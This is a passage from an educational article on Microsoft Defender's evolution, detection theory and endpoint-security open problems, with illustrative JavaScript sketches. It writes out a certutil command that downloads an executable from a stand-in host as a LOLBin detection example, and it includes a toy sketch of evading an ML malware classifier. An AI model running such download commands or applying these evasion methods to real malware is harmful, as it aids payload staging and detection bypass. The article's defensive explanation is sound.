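  { title: 'Suspicious PowerShell', entities: ['device:WS-01', 'user:alice'] },
  { title: 'LSASS memory read', entities: ['device:WS-01'] },
  { title: 'Remote logon with alice', entities: ['user:alice', 'device:SRV-07'] },
  { title: 'Adware installer', entities: ['device:WS-99'] },
];
console.log(groupIntoIncidents(alerts));
```

The shared device links the first two alerts, and the shared account pulls in the lateral-movement alert on a second machine. The unrelated adware alert stays in its own incident.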

Attack Surface Reduction

Beyond detection, Microsoft introduced Attack Surface Reduction (ASR) rules -- configurable policies that block risky behaviors proactively [@asr-rules].

Attack Surface Reduction (ASR) rules: Configurable rules in Microsoft Defender that block specific dangerous behaviors before they execute -- for example, blocking Office applications from creating child processes, preventing credential theft from LSASS, or blocking untrusted and unsigned processes that run from USB drives.

ASR operates on a simple principle: certain behaviors are almost never legitimate. Office applications spawning child processes? Almost always malicious macro activity. A process reading LSASS memory? Almost always credential dumping. ASR blocks these patterns outright, without needing to classify the specific malware.
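The "almost never legitimate" principle maps naturally onto predicates over events. This JavaScript sketch is a hypothetical model. The event shapes, the matching logic, and the first-match evaluation order are invented. The two rule names are real ASR rule titles, but their actual implementations are Microsoft's, not these functions. The block and audit modes reflect the fact that ASR rules can run in audit mode before enforcement.

```javascript
// Hypothetical ASR-style rules as predicates over endpoint events.
const OFFICE_APPS = new Set(['winword.exe', 'excel.exe', 'powerpnt.exe', 'outlook.exe']);
const PROCESS_VM_READ = 0x0010;

const rules = [
  {
    name: 'Block all Office applications from creating child processes',
    mode: 'block',
    matches: (e) => e.type === 'process_create' && OFFICE_APPS.has(e.parent.toLowerCase()),
  },
  {
    name: 'Block credential stealing from the Windows local security authority subsystem (lsass.exe)',
    mode: 'audit',
    matches: (e) => e.type === 'handle_open' && e.target.toLowerCase() === 'lsass.exe' &&
      (e.access & PROCESS_VM_READ) !== 0,
  },
];

// First matching rule decides; audit mode logs but lets the action proceed.
function evaluate(event) {
  for (const rule of rules) {
    if (!rule.matches(event)) continue;
    return { allowed: rule.mode !== 'block', logged: rule.name, mode: rule.mode };
  }
  return { allowed: true, logged: null, mode: null };
}

console.log(evaluate({ type: 'process_create', parent: 'WINWORD.EXE', child: 'powershell.exe' }));
console.log(evaluate({ type: 'handle_open', source: 'rundll32.exe', target: 'lsass.exe', access: PROCESS_VM_READ }));
console.log(evaluate({ type: 'process_create', parent: 'explorer.exe', child: 'notepad.exe' }));
```

None of the rules needs to know which malware family is running. Each rule matches a behavior, which is why ASR keeps working against variants no classifier has seen.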

Alongside ASR, Microsoft deployed Controlled Folder Access (protecting specified directories from unauthorized modification -- a direct anti-ransomware measure), Tamper Protection (preventing malware from disabling Defender itself), and Network Protection (blocking connections to known malicious domains).

From ATP to XDR

Extended Detection and Response (XDR): A cross-domain security platform that correlates signals across endpoints, email, identity, and cloud applications into a unified detection and response system. XDR extends EDR's assume-breach philosophy from individual endpoints to the entire organizational attack surface.

As the Sunburst incident demonstrated, ATP's fundamental limitation was endpoint-only visibility -- it had no insight into email-based attacks, identity compromises, or cloud application abuse. Sophisticated attacks span multiple vectors.

Microsoft's response was to unify all its security products into Microsoft Defender XDR -- correlating signals from Defender for Endpoint, Defender for Office 365, Defender for Identity, and Defender for Cloud Apps. When a phishing email delivers a credential-stealing payload that enables lateral movement to a cloud application, XDR reconstructs the entire attack chain across all domains.

The platform also went cross-platform. Between 2019 and 2020, Microsoft dropped "Windows" from the name and launched support for macOS (behavioral monitoring engine), Linux (initially auditd-based sensor, migrated to eBPF in 2023), Android, and iOS [@wp-defender]. In January 2022, Defender for Endpoint Plan 1 was included in Microsoft 365 E3 licenses at no extra cost, dramatically expanding the addressable market [@mde-p1-e3].

On July 19, 2024, a faulty CrowdStrike Falcon content update caused approximately 8.5 million Windows systems to crash with the blue screen of death [@crowdstrike-outage]. The incident highlighted the catastrophic risk of kernel-mode security agents and the danger of uncontrolled global content rollouts.

By 2024, Defender XDR achieved top-tier MITRE ATT&CK Enterprise results with zero false positives, with Microsoft specifically highlighting 100% technique-level detections across Linux and macOS attack stages [@mitre-2024]. The product lineage that scored 0.5/6 a decade earlier was now part of one of the top-performing security platforms in the industry. But how does it compare to the competition?

The Competition: How Defender Stacks Up

Microsoft isn't the only company that figured out cloud-scale endpoint protection. CrowdStrike, SentinelOne, Palo Alto Cortex XDR, and Sophos have all built formidable platforms. Each makes a different architectural bet -- and each has a distinctive weakness.

Feature	Microsoft Defender	CrowdStrike Falcon	SentinelOne Singularity	Cortex XDR	Sophos Intercept X
Architecture	OS-integrated + cloud	Cloud-native agent	Autonomous on-device AI	Network + endpoint fusion	Prevention-first DL
MITRE 2024 claim	Enterprise: 100%, 0 FP	Managed Services: fastest detection (4 min)	Enterprise: 100%, 88% fewer alerts	Enterprise: 100%, 0 FP	Strong prevention
OS Integration	Deepest (AMSI, ELAM, Secure Boot)	Third-party agent	Third-party agent	Third-party agent	Third-party agent
Offline Capability	On-device ML + signatures	Limited (on-device ML)	Best (autonomous AI)	On-device ML	On-device DL
Ransomware Defense	Controlled Folder Access	Behavioral detection	VSS rollback	Behavioral detection	CryptoGuard rollback
Cost	Included with M365 E3/E5	Premium ($$$)	Mid-premium ($$)	Mid-premium ($$)	Mid-market ($)
Key Differentiator	OS integration + M365 stack	Threat intel + managed hunting	Autonomous response	Network-endpoint fusion	Long-tenured Gartner Leader
Key Weakness	Vendor lock-in	Premium cost; July 2024 outage risk	Smaller telemetry base	Requires Palo Alto stack	Enterprise perception

CrowdStrike Falcon dominates the pure-play EDR market with cloud-native architecture and premium threat intelligence. In the 2024 MITRE Managed Services evaluation, CrowdStrike set the record for fastest detection at four minutes [@crowdstrike-mitre-speed]. But its July 2024 outage -- when a faulty content update crashed 8.5 million Windows systems [@crowdstrike-outage] -- exposed the risks of kernel-mode agents, and premium pricing makes it cost-prohibitive for many organizations.

The July 2024 CrowdStrike incident was not a cyberattack -- it was a quality assurance failure in a content update that went global without staged rollout. But it exposed a systemic risk: kernel-mode security agents have the same level of access as the OS kernel itself. A bug in the agent crashes the entire system. This is why Microsoft has invested in Virtualization-Based Security (VBS) and Hypervisor-protected Code Integrity (HVCI) -- moving security enforcement into a layer more resilient than the traditional kernel.
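The staged rollout that this update lacked is easy to sketch. The JavaScript below is a minimal illustration, not CrowdStrike's or Microsoft's actual pipeline. The ring names, ring sizes, the 0.1% crash-rate threshold, and the `crashRateFor` telemetry callback are all hypothetical. It shows one thing: a health gate at each ring caps how many hosts a bad update can reach.

```javascript
// Hypothetical ring-based rollout: each ring must stay below a crash-rate
// threshold before the next, larger ring receives the update.
// Ring sizes, threshold, and telemetry callback are illustrative assumptions.
const RINGS = [
  { name: 'internal canary', hosts: 1000 },
  { name: 'early adopters', hosts: 50000 },
  { name: 'broad', hosts: 8500000 },
];

function stagedRollout(update, crashRateFor, maxCrashRate = 0.001) {
  let exposed = 0;
  for (const ring of RINGS) {
    exposed += ring.hosts; // every host in this ring now has the update
    const rate = crashRateFor(update, ring); // observed crash rate in this ring
    if (rate > maxCrashRate) {
      // Gate fails: stop before any larger ring is exposed.
      return { halted: true, atRing: ring.name, hostsExposed: exposed, crashRate: rate };
    }
  }
  return { halted: false, hostsExposed: exposed };
}

// A content update that crashes every host that loads it.
const badUpdate = { id: 'content-update-X' };
console.log(stagedRollout(badUpdate, () => 1.0));
```

With a 100% crash rate, the rollout halts at the first ring after exposing 1,000 hosts instead of the whole fleet. A real gate would also need a soak period to observe crashes before promoting to the next ring. This sketch does not model that.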

SentinelOne Singularity makes the opposite bet from CrowdStrike: autonomous on-device AI that can detect, respond, and remediate without cloud connectivity or human intervention. Its Storyline technology automatically chains related events into coherent attack narratives. In the 2024 MITRE evaluation, SentinelOne achieved 100% detection with 88% fewer alerts than the median vendor -- the best signal-to-noise ratio [@sentinelone-mitre]. Its ransomware rollback via VSS snapshots is a distinctive capability.

Palo Alto Cortex XDR brings a network-centric heritage, uniquely correlating firewall telemetry with endpoint data. In MITRE 2024 it achieved 100% technique-level detection with no configuration changes, which Palo Alto describes as a first for any participant, along with the highest prevention rate and zero false positives [@cortex-xdr-mitre]. But without Palo Alto firewalls, Cortex XDR loses its key differentiator.

Sophos Intercept X holds one of the longest tenures as a Gartner EPP Leader, with 16 consecutive Leader placements in the EPP Magic Quadrant by 2025, dating back to the inaugural 2007 edition [@sophos-gartner-2025]. Its deep learning engine and CryptoGuard anti-ransomware technology are strong, and its pricing targets the mid-market effectively.

Note: If you're in the Microsoft 365 environment, Defender for Endpoint offers the best cost-to-value ratio with the deepest OS integration. If you need cloud-native threat intelligence with managed hunting, CrowdStrike Falcon is the premium choice. If autonomous offline protection matters most, SentinelOne excels. If you have Palo Alto firewalls, Cortex XDR's network-endpoint correlation is unmatched. For mid-market budgets, Sophos offers strong prevention at competitive pricing.

All five platforms achieve remarkable detection rates -- 99.9%+ in controlled testing. But none of them can be perfect. A 1986 PhD thesis proved that, and the proof still holds.

Theoretical Limits: The Defender's Dilemma

In his 1986 dissertation, with the journal version following in 1987, Fred Cohen proved something uncomfortable: perfect virus detection is mathematically impossible [@cohen-1986]. His proof ties the problem to the Halting Problem: a perfect virus detector could be used to decide whether arbitrary programs halt, and Alan Turing showed in 1936 that the Halting Problem is undecidable. Every antivirus product, including Defender, operates under this ceiling.

The general form of the virus detection problem is algorithmically undecidable. -- Fred Cohen, 1986 dissertation [@cohen-1986]

The proof works by contradiction. Assume a perfect virus detector $D(P)$ exists -- a function that takes any program $P$ as input and returns true if $P$ is a virus and false otherwise. Now construct a program $V$ that:

Runs $D$ on its own code, computing $D(V)$
If $D(V)$ says "virus," $V$ does nothing harmful (benign behavior)
If $D(V)$ says "not a virus," $V$ becomes a virus

This creates a contradiction: if $D$ says $V$ is a virus, $V$ is benign. If $D$ says $V$ is benign, $V$ is a virus. Therefore, $D$ cannot exist. The construction mirrors Turing's proof that no algorithm can determine whether an arbitrary program halts.
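The construction can be made concrete in a few lines. In this toy JavaScript sketch, a "program" is an object whose `run()` method reports how it behaves, and a candidate detector `D` is any function that returns `true` for "virus." `constructV` and the candidate detectors are hypothetical illustrations, not a model of real malware.

```javascript
// Toy illustration of Cohen's diagonal construction (not a real detector).
// `detector` is any candidate D: it returns true for "virus", false for "benign".
function constructV(detector) {
  const V = {
    name: 'V',
    // V asks D about itself, then does the opposite of the verdict.
    run() { return detector(V) ? 'benign' : 'virus'; },
  };
  return V;
}

// Hypothetical candidate detectors with very different strategies.
const candidates = {
  'always says virus': () => true,
  'always says clean': () => false,
  'flags programs named V': (p) => p.name === 'V',
  'flags programs with a run method': (p) => typeof p.run === 'function',
};

for (const [label, D] of Object.entries(candidates)) {
  const V = constructV(D);
  const verdict = D(V) ? 'virus' : 'benign';
  const actual = V.run();
  console.log(`${label}: D(V) = ${verdict}, V actually behaves as ${actual}`);
}
```

Whatever rule a candidate `D` uses, its verdict on its own `V` is wrong. A detector that tries to settle the question by executing `V.run()` recurses without end, because `V` calls `D` again. That is where the link to the Halting Problem appears.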

Figure: flowchart of Cohen's proof by contradiction, from "Assume perfect detector D exists" through the two contradictory branches to "Therefore D cannot exist."

Undecidability: a property of computational problems for which no algorithm can produce a correct answer for all possible inputs. Fred Cohen's 1986 dissertation proof that general virus detection is undecidable means that no antivirus -- no matter how advanced its ML models or how vast its training data -- can correctly classify every possible program as malicious or benign.

Key idea: Defender achieving 100% in MITRE evaluations is remarkable -- but it is 100% of that specific test set, not 100% of all possible malware. The theoretical ceiling is real and unbridgeable. No amount of ML training data or cloud compute will ever close the gap.

The Base Rate Fallacy

Even setting aside undecidability, practical detection at scale faces a statistical nightmare. Consider a classifier with 99.99% specificity (a 0.01% false positive rate) scanning 100 billion events per day across a large enterprise. Because nearly all of those events are benign, it produces approximately 10 million false alerts per day. This is the base rate fallacy: when the base rate of malicious events is low, even extremely accurate classifiers produce overwhelming false positive volumes.

$$\text{False Positives} = \text{Benign Events} \times (1 - \text{Specificity}) \approx 10^{11} \times 10^{-4} = 10^{7}$$
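Extending the same arithmetic to precision (the share of alerts that are real) shows how lopsided the alert queue becomes. This JavaScript sketch keeps the $10^{11}$ events and 99.99% specificity from above. The figure of 1,000 truly malicious events per day and the 99% sensitivity are assumptions chosen only for illustration.

```javascript
// Worked base-rate arithmetic. totalEvents and specificity follow the text;
// maliciousEvents and sensitivity are illustrative assumptions.
function alertMath({ totalEvents, maliciousEvents, sensitivity, specificity }) {
  const benign = totalEvents - maliciousEvents;
  const truePositives = maliciousEvents * sensitivity;   // real attacks that alert
  const falsePositives = benign * (1 - specificity);     // benign events that alert
  const precision = truePositives / (truePositives + falsePositives);
  return { truePositives, falsePositives, precision };
}

const r = alertMath({ totalEvents: 1e11, maliciousEvents: 1000, sensitivity: 0.99, specificity: 0.9999 });
console.log(`true alerts:  ${Math.round(r.truePositives)}`);
console.log(`false alerts: ${Math.round(r.falsePositives).toLocaleString('en-US')}`);
console.log(`share of alerts that are real: ${(r.precision * 100).toFixed(4)}%`);
```

Under these assumptions, roughly 990 true alerts compete with about 10 million false ones, so only about 0.01% of alerts are real.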

This is why Defender's zero-false-positive result in the MITRE evaluation -- against a curated test set of dozens of scenarios -- is impressive but not directly translatable to production environments processing billions of events.

In 1996, Adam Young and Moti Yung -- Young at Columbia University and Yung at IBM Research -- introduced "cryptovirology," the theoretical framework for using public-key cryptography offensively in malware [@young-yung-1996]. They predicted the ransomware extortion model a full decade before real-world ransomware epidemics. Their work informs the cryptographic threat models that Defender's Controlled Folder Access and modern anti-ransomware features are designed to counter.

The Adversarial ML Problem

ML classifiers can be deliberately evaded. Adversarial machine learning research has shown that carefully crafted perturbations can cause classifiers to misclassify malicious files as benign while preserving malicious functionality. NIST published a taxonomy of these attacks in March 2025 [@nist-adversarial-ml], and a 2025 IEEE Access survey cataloged adversarial evasion techniques specific to malware analysis [@adversarial-malware-survey].

Note: As ML becomes the primary detection mechanism across all major endpoint protection platforms, adversarial evasion attacks become a systemic industry risk. A technique that evades one vendor's ML model may generalize to others trained on similar features. There is currently no provably resilient defense against adversarial malware perturbations.

We can't build a perfect antivirus. But we can make attacks so expensive that most threat actors can't afford to succeed. The real question is: what's left to solve?

Open Problems: The Frontier

Defender XDR represents the state of the art, but the problems it can't yet solve are arguably more interesting than the ones it has solved.

Adversarial ML Evasion

The adversarial ML problem is the most pressing theoretical challenge in endpoint protection. Attackers use three main strategies to fool ML classifiers [@adversarial-malware-survey]:

Gradient-based evasion: With white-box access, attackers compute the gradient of the ML model's loss function and apply small perturbations -- appending benign bytes, modifying unused PE header fields, or inserting dead code -- that flip the classifier's verdict from "malicious" to "benign" without changing the file's behavior.
Feature-space manipulation: Rather than targeting the model directly, attackers modify the features the model relies on. Padding a binary with low-entropy data to lower its measured entropy, removing suspicious imports, or injecting benign API calls can shift the feature vector into "clean" territory.
Black-box transfer attacks: Attackers train a substitute model on the same public malware datasets, generate adversarial examples against it, and rely on transferability -- the observation that perturbations effective against one model often fool others trained on similar data.
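Gradient-guided evasion is easiest to see on a linear model, where the gradient of the logit with respect to the input is simply the weight vector. The sketch below is a toy. The classifier, its weights, and the feature names are hypothetical. The attacker may only increase features it can append without touching the payload (benign imports or strings), which mirrors the "preserve malicious functionality" constraint described above.

```javascript
// Hypothetical linear malware classifier: p(malicious) = sigmoid(w . x + b).
// Weights and features are illustrative assumptions, not any vendor's model.
const WEIGHTS = { entropy: 0.8, suspiciousImports: 0.5, benignImports: -0.4, benignStrings: -0.3 };
const BIAS = -6.0;

// Features the attacker may only increase: appending benign imports or
// strings never removes the malicious code.
const APPENDABLE = ['benignImports', 'benignStrings'];

function sigmoid(z) { return 1 / (1 + Math.exp(-z)); }

function score(x) {
  let z = BIAS;
  for (const [k, w] of Object.entries(WEIGHTS)) z += w * x[k];
  return sigmoid(z);
}

// For a linear model the gradient of the logit w.r.t. x is w, so each step
// bumps the appendable feature whose weight is most negative (steepest descent).
function evade(sample, maxSteps = 100) {
  const x = { ...sample }; // never mutate the caller's sample
  let steps = 0;
  while (score(x) >= 0.5 && steps < maxSteps) {
    const best = APPENDABLE.reduce((a, b) => (WEIGHTS[a] < WEIGHTS[b] ? a : b));
    x[best] += 1;
    steps += 1;
  }
  return { x, steps, finalScore: score(x) };
}

const sample = { entropy: 7.8, suspiciousImports: 8, benignImports: 0, benignStrings: 0 };
console.log('before:', score(sample).toFixed(3));
const result = evade(sample);
console.log(`after ${result.steps} appended benign imports:`, result.finalScore.toFixed(3));
```

With these made-up weights, eleven appended benign imports flip the verdict. The entropy and suspicious-import features, which stand in for the payload, stay untouched. Real PE classifiers are nonlinear, so the perturbations are messier, but the mechanism is the same.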

Defenses carry trade-offs. Adversarial training (retraining on adversarial examples) improves resilience but reduces accuracy on clean samples by 2--5%. Defensive distillation smooths decision boundaries but is vulnerable to targeted Carlini-Wagner attacks. Certified resilience bounds provide formal guarantees for specific perturbation radii but scale poorly to the high-dimensional feature spaces of PE files [@nist-adversarial-ml].

The fundamental difficulty is asymmetric: the attacker needs to find only one evasion, while the defender must block all of them. This asymmetry may be irreducible, since it echoes the same undecidability result that limits all virus detection.

Living-off-the-Land Binaries

Legitimate, Microsoft-signed system binaries -- such as PowerShell, certutil.exe, mshta.exe, and bitsadmin.exe -- that attackers repurpose for malicious activities. Because these tools are trusted by the OS and required for legitimate operations, they cannot simply be blocked without breaking normal functionality.

Attackers increasingly use the system's own tools against it. Cybereason incident response found LOLBin involvement in an estimated 17% of security incidents in Q3 2025, up from roughly 13% in the first half of the year [@cybereason-lolbin]. The LOLBAS project catalogs hundreds of legitimate binaries, scripts, and libraries that can be abused [@lolbas-project].

The detection challenge is distinguishing legitimate from malicious use of the same binary. When `certutil -urlcache -split -f http://example.com/update.exe` appears in process telemetry, is it an administrator's legitimate download or attacker staging? Current detection approaches analyze command-line arguments, parent process context, and execution frequency baselines -- but false positive rates remain high for these ambiguous cases. ML models trained on command-line features show promise, but they struggle with novel argument combinations absent from their training data.
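A rule-based version of the three signals named above (arguments, parent process, frequency baseline) might look like the JavaScript sketch below. Everything in it is an assumption for illustration: the weights, the 0.5 alert threshold, the list of risky parent processes, and the shape of the event and baseline objects.

```javascript
// Hypothetical heuristic for certutil.exe process events. Weights, threshold,
// parent list, and data shapes are illustrative assumptions.
const RISKY_PARENTS = new Set(['winword.exe', 'excel.exe', 'outlook.exe', 'wscript.exe', 'mshta.exe']);

function scoreCertutil(evt, baselineCounts, rareThreshold = 5) {
  const cmd = evt.commandLine.toLowerCase();
  const parent = evt.parent.toLowerCase();
  let score = 0;
  const reasons = [];
  // 1. Argument analysis: -urlcache plus a URL means certutil is downloading a file.
  if (cmd.includes('-urlcache') && /https?:\/\//.test(cmd)) {
    score += 0.4; reasons.push('download via -urlcache');
  }
  // 2. Parent process context: Office apps and script hosts rarely need certutil.
  if (RISKY_PARENTS.has(parent)) {
    score += 0.4; reasons.push('unusual parent ' + evt.parent);
  }
  // 3. Frequency baseline: how often has this parent launched certutil here before?
  const seen = baselineCounts[parent] || 0;
  if (seen < rareThreshold) {
    score += 0.2; reasons.push('rare in baseline (' + seen + ' prior)');
  }
  return { alert: score >= 0.5, score, reasons };
}

const baseline = { 'powershell.exe': 240, 'cmd.exe': 85 };
const cmdLine = 'certutil -urlcache -split -f http://example.com/update.exe';
console.log(scoreCertutil({ parent: 'powershell.exe', commandLine: cmdLine }, baseline));
console.log(scoreCertutil({ parent: 'WINWORD.EXE', commandLine: cmdLine }, baseline));
```

The identical command line scores 0.4 (no alert) when launched from a routinely seen `powershell.exe` and 1.0 (alert) when launched from Word. The weakness is just as visible: an attacker who stages the download from PowerShell inherits the administrator's low score.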

Privacy-Preserving Telemetry

Cloud-delivered protection requires sending endpoint telemetry to vendor cloud infrastructure, raising significant privacy concerns under regulations like GDPR and CCPA. Organizations in sensitive sectors -- government, healthcare, finance -- may refuse to share endpoint data with cloud services.

Federated learning (FL) offers a path forward: training ML models across distributed endpoints without centralizing raw data. Each endpoint trains a local model on its own data and shares only model weight updates -- not raw telemetry -- with a central aggregator. Recent research (2024) demonstrated FL-trained malware detection models achieving detection rates comparable to centralized approaches, with strong adversarial resilience [@fl-malware-2024].
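Federated averaging (FedAvg) is the standard aggregation step behind this idea. The JavaScript sketch below assumes a tiny logistic-regression detector with three hypothetical features (a bias term, normalized entropy, and a packed flag), and two endpoints holding different local data. Only weight vectors leave each endpoint. The aggregator averages them, weighted by each endpoint's sample count. This is a generic illustration, not the method of the cited research.

```javascript
// Minimal FedAvg sketch with a tiny logistic-regression detector.
// Features per sample: [bias, normalizedEntropy, isPacked] (hypothetical).
function sigmoid(z) { return 1 / (1 + Math.exp(-z)); }

// One endpoint: a few epochs of full-batch gradient descent on local data only.
function localTrain(globalW, data, lr = 0.1, epochs = 20) {
  const w = globalW.slice();
  for (let e = 0; e < epochs; e++) {
    const grad = new Array(w.length).fill(0);
    for (const { x, y } of data) {
      const p = sigmoid(x.reduce((s, xi, i) => s + xi * w[i], 0));
      x.forEach((xi, i) => { grad[i] += (p - y) * xi; });
    }
    for (let i = 0; i < w.length; i++) w[i] -= (lr * grad[i]) / data.length;
  }
  return { weights: w, n: data.length }; // only weights and a count are shared
}

// Aggregator: average client weights, weighted by each client's sample count.
function fedAvg(updates) {
  const total = updates.reduce((s, u) => s + u.n, 0);
  const dim = updates[0].weights.length;
  const avg = new Array(dim).fill(0);
  for (const { weights, n } of updates) {
    for (let i = 0; i < dim; i++) avg[i] += (n / total) * weights[i];
  }
  return avg;
}

// Two endpoints with differently skewed (non-IID) local data.
const endpoints = [
  [{ x: [1, 0.90, 1], y: 1 }, { x: [1, 0.20, 0], y: 0 }, { x: [1, 0.95, 1], y: 1 }],
  [{ x: [1, 0.10, 0], y: 0 }, { x: [1, 0.30, 0], y: 0 }, { x: [1, 0.85, 1], y: 1 }, { x: [1, 0.15, 0], y: 0 }],
];

let globalW = [0, 0, 0];
for (let round = 0; round < 5; round++) {
  const updates = endpoints.map((data) => localTrain(globalW, data));
  globalW = fedAvg(updates);
}

const predict = (x) => sigmoid(x.reduce((s, xi, i) => s + xi * globalW[i], 0));
console.log('global weights:', globalW.map((v) => v.toFixed(3)));
console.log('p(malicious), packed high-entropy file:', predict([1, 0.9, 1]).toFixed(3));
console.log('p(malicious), unpacked low-entropy file:', predict([1, 0.1, 0]).toFixed(3));
```

The two endpoints deliberately hold differently skewed samples, a small-scale version of the non-IID problem. The more heterogeneous those local datasets become, the more slowly the averaged model converges.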

The challenge is federated convergence. Heterogeneous endpoint environments (different OS versions, installed software, usage patterns) produce non-IID data: each endpoint's samples come from a different distribution. These statistical differences slow model convergence and reduce accuracy by an amount that ranges from minor to significant, depending on how heterogeneous the distributions are. Communication efficiency is another bottleneck: frequent weight updates consume bandwidth, while infrequent updates slow convergence further.

Supply Chain Attack Detection

The SolarWinds lesson remains unresolved. When malicious code arrives through a legitimately signed software update from a trusted vendor, every endpoint protection layer is bypassed by design. Current partial solutions include Software Bill of Materials (SBOM) tracking, build environment integrity verification via the SLSA framework, and behavioral monitoring of post-update software activity. None achieves full supply chain integrity verification -- the problem requires verifying the entire build and distribution pipeline, not just the final artifact.
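The build-integrity piece can be illustrated with a provenance check. The check confirms that an artifact's SHA-256 digest matches a subject in a build-provenance statement, and that the statement names the expected builder. The JavaScript sketch below uses Node's built-in `crypto` module. The statement layout is modeled loosely on in-toto/SLSA v1 provenance. The builder URL and artifact names are hypothetical, and verifying the statement's signature is assumed to happen elsewhere.

```javascript
const crypto = require('crypto');

// Hypothetical builder identity that this organization trusts.
const TRUSTED_BUILDER = 'https://builder.example.com/release-pipeline';

function sha256Hex(bytes) {
  return crypto.createHash('sha256').update(bytes).digest('hex');
}

// Checks an artifact against an in-toto/SLSA-style provenance statement.
// Signature verification of the statement itself is deliberately omitted.
function checkProvenance(artifactName, artifactBytes, statement) {
  const subject = statement.subject.find((s) => s.name === artifactName);
  if (!subject) return { ok: false, reason: 'artifact not listed in provenance' };
  if (subject.digest.sha256 !== sha256Hex(artifactBytes)) {
    return { ok: false, reason: 'digest mismatch: artifact differs from what was built' };
  }
  const builder = statement.predicate?.runDetails?.builder?.id;
  if (builder !== TRUSTED_BUILDER) return { ok: false, reason: `unexpected builder ${builder}` };
  return { ok: true, reason: 'artifact matches provenance from trusted builder' };
}

const update = Buffer.from('agent-update-v2 contents');
const statement = {
  _type: 'https://in-toto.io/Statement/v1',
  subject: [{ name: 'agent-update-v2.msi', digest: { sha256: sha256Hex(update) } }],
  predicateType: 'https://slsa.dev/provenance/v1',
  predicate: { runDetails: { builder: { id: TRUSTED_BUILDER } } },
};

console.log(checkProvenance('agent-update-v2.msi', update, statement));
console.log(checkProvenance('agent-update-v2.msi', Buffer.from('tampered'), statement));
```

This check catches tampering between build and install. It would not stop a SolarWinds-style compromise, where malicious code is injected during the build itself: the compromised artifact matches its provenance exactly. That is why verifying only the final artifact falls short.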

The Bootstrap Problem

Endpoint protection agents run at kernel level to monitor the system, but the agent is only as trustworthy as the kernel itself. A kernel-level compromise (rootkit) subverts the protector entirely. Windows 11 Secured-core PCs address this with layered hardware trust: Virtualization-Based Security (VBS) isolates security-critical code in a hypervisor-protected enclave, Hypervisor-protected Code Integrity (HVCI) ensures only signed code runs in kernel mode, and Credential Guard protects authentication secrets from kernel-level theft. Intel Threat Detection Technology (TDT) adds hardware-level signals by applying ML to CPU performance-monitoring telemetry. But no solution provides formal verification of kernel integrity at runtime -- the chain of trust always terminates at hardware, and hardware can be compromised too.

The "who protects the protector?" problem has no complete software-only solution. Hardware-assisted security (TPM, Intel TDT, AMD SEV) pushes the trust anchor deeper, but the chain of trust always terminates somewhere.
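How a chain of trust is anchored can be sketched with the TPM's extend operation. A platform configuration register (PCR) is never written directly; it is only updated as new PCR = SHA-256(old PCR || measurement). This JavaScript sketch uses Node's `crypto` module and hypothetical component names. Real measured boot records many components across several PCRs plus an event log, which is omitted here.

```javascript
const crypto = require('crypto');

const sha256 = (data) => crypto.createHash('sha256').update(data).digest();

// TPM-style extend: new PCR = SHA-256(old PCR || SHA-256(component)).
function extend(pcr, component) {
  return sha256(Buffer.concat([pcr, sha256(Buffer.from(component))]));
}

// A PCR starts at all zeros and can only be extended, never set directly,
// so the final value commits to every measured component, in order.
function measureBoot(components) {
  return components.reduce((pcr, c) => extend(pcr, c), Buffer.alloc(32));
}

// Hypothetical boot chains; component names stand in for measured binaries.
const goodBoot = ['firmware v1.2', 'bootmgr', 'winload', 'ntoskrnl', 'security-agent.sys'];
const tamperedBoot = ['firmware v1.2', 'bootmgr', 'winload', 'ntoskrnl', 'rootkit.sys'];

const expected = measureBoot(goodBoot).toString('hex');
const observed = measureBoot(tamperedBoot).toString('hex');
console.log('expected:', expected);
console.log('observed:', observed);
console.log('matches: ', observed === expected);
```

Swapping one driver changes the final value, and so does reordering components. But the first measurement is taken by code the TPM simply has to trust (the static root of trust), so the scheme pushes the trust anchor down into hardware rather than eliminating it.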

Windows Defender started as an antispyware tool that couldn't detect viruses. It evolved through failure, humiliation, and relentless engineering into one of the world's most sophisticated security platforms. The next chapter -- adversarial ML, supply chain integrity, privacy-preserving telemetry -- is being written now. The only certainty is Fred Cohen's: perfection is provably impossible. But the pursuit of it protects a billion endpoints every day.

Practical Guide: Deploying Defender Today

Theory is interesting, but if you're responsible for securing endpoints, you need practical guidance. Here's how to get the most out of Defender.

Consumer vs. Enterprise Tiers

Windows Security (the consumer-facing app built into Windows 10/11) provides next-generation antivirus, cloud-delivered protection, and basic firewall management. For enterprises, Defender for Endpoint comes in two plans [@mde-p1-e3]:

Plan 1 (included in M365 E3): Next-gen AV, ASR rules, device-based conditional access, Tamper Protection
Plan 2 (M365 E5 or standalone): Everything in P1 plus EDR, automated investigation and response, threat analytics, advanced hunting, and Security Copilot integration

Enabling Cloud Protection

Cloud-delivered protection is the single most impactful feature to verify [@cloud-protection]. Without it, Defender relies only on local signatures and on-device models -- essentially regressing to 2015-era detection. Verify that it's enabled:

Open PowerShell as administrator and run:

```
Get-MpPreference | Select-Object MAPSReporting, SubmitSamplesConsent, CloudBlockLevel, CloudExtendedTimeout
```

Ideal values: `MAPSReporting = 2` (Advanced), `SubmitSamplesConsent = 1` (Send safe samples automatically), `CloudBlockLevel = 2` or higher.
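Checking one machine by hand does not scale to a fleet. Assume each host's settings are exported as JSON, for example by piping the `Select-Object` output above through `ConvertTo-Json`. A small checker can then compare them against the ideal values listed above. The JavaScript below is a hypothetical sketch; the host names and the export format are assumptions.

```javascript
// Hypothetical fleet audit of exported Defender cloud-protection settings.
// Thresholds follow the "ideal values" above; export format is an assumption.
const CHECKS = [
  { key: 'MAPSReporting', ok: (v) => v === 2, want: '2 (Advanced)' },
  { key: 'SubmitSamplesConsent', ok: (v) => v === 1, want: '1 (Send safe samples automatically)' },
  { key: 'CloudBlockLevel', ok: (v) => v >= 2, want: '2 or higher' },
];

function auditCloudProtection(host, json) {
  const prefs = JSON.parse(json);
  const findings = [];
  for (const { key, ok, want } of CHECKS) {
    if (!(key in prefs)) findings.push(`${key}: missing from export`);
    else if (!ok(prefs[key])) findings.push(`${key}: got ${prefs[key]}, want ${want}`);
  }
  return { host, compliant: findings.length === 0, findings };
}

const hostExports = {
  'ws-001': '{"MAPSReporting":2,"SubmitSamplesConsent":1,"CloudBlockLevel":2}',
  'ws-002': '{"MAPSReporting":0,"SubmitSamplesConsent":2,"CloudBlockLevel":0}',
};
for (const [host, json] of Object.entries(hostExports)) {
  console.log(auditCloudProtection(host, json));
}
```

Hosts with a missing property are reported rather than silently passed, since an incomplete export is itself worth investigating.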

```javascript
// Signature-based detection: exact hash match
function signatureDetect(fileHash, signatureDB) {
  return signatureDB.includes(fileHash);
}

// ML-based detection: feature vector classification
function mlDetect(features) {
  const { entropy, suspiciousImports, isPacked } = features;
  const score =
    (entropy > 7.0 ? 0.4 : 0) +
